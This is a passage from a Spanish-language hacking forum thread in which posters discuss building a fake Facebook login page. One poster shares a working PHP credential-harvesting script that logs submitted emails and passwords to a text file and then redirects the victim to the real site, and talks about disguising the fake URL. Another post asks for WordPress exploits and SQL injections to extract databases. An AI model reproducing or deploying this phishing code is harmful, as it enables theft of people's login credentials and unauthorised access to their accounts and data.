Messages

[PD:]

Y si enmascaras el localhost con la url de la original... si tienes acceso a la maquina claro está para ello, aunque está más difícil sin acceso, lo digo por el tema de la url diferente.


PD: este post tiene casi 2700visitas y nadie ha dicho nada...

Aquí os dejo una idea de write.php   por cierto no habría que redirigir al señor de nuevo a la web original y pasarle los campos a esa webs para que se loguease? eso sería sublime.

Actualizo con un header fácilmente se le redirigiría, por cierto me he dado cuenta que después de sacar la web con Chrome por lo menos se me queda más pequeña que la real ajaajajaa se nota la diferencia, por otra parte lo de pasar los imputs a la real y hacer el submit es más complejo me da...

Code Select Expand

<?php
$email="";
if (!empty($_REQUEST['email'])){
$email=$_REQUEST['email'];
}

$pass="";
if (!empty($_REQUEST['pass'])){
$pass=$_REQUEST['pass'];
}
 
//Luego sobrescribo el txt
 
$archivo="datos.txt";
 
$file=fopen($archivo,"a"); 
fwrite($file,$email.$pass);  

header('Location: http://www.facebook.com');

?>

y donde esta el write.php del script capture pass, porque pusiste lo más sencillo que no tiene mayor complicación el script es lo importante creo yo. -.-)

Buenas, quisiera saber si existen vulnerabilidades para última versión de Wordpress, exploits, sql injections, para poder sacar bases de datos.

A ver quien me puede explicar y enseñar un poco si es que existen que creo que si.

También me interesa saber como evitarlas.

Un saludo y muchas gracias de antemano.